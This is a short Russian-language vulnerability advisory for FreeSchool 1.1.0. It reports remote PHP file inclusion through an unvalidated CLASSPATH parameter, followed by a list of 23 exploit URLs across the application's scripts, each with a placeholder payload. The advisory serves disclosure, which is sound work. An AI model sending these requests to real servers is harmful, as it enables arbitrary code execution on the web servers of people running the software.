Программа: FreeSchool 1.1.0
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «CLASSPATH» множественными сценариями. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера.
Эксплоит:
http://localhost/[path]/biblioteca/bib_form.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/biblioteca/bib_pldetails.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/biblioteca/bib_plform.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/biblioteca/bib_plsearchc.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/biblioteca/bib_plsearchs.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/biblioteca/bib_save.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/biblioteca/bib_searchc.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/biblioteca/bib_searchs.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/biblioteca/edi_form.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/biblioteca/edi_save.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/biblioteca/gen_form.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/biblioteca/gen_save.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/biblioteca/lin_form.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/biblioteca/lin_save.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/biblioteca/luo_form.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/biblioteca/luo_save.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/biblioteca/sog_form.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/biblioteca/sog_save.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/calendario/cal_insert.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/calendario/cal_save.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/calendario/cal_saveactivity.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/circolari/cir_save.php?CLASSPATH=[AvriLhea]
http://localhost/[path]/modulistica/mdl_save.php?CLASSPATH=[AvriLhea]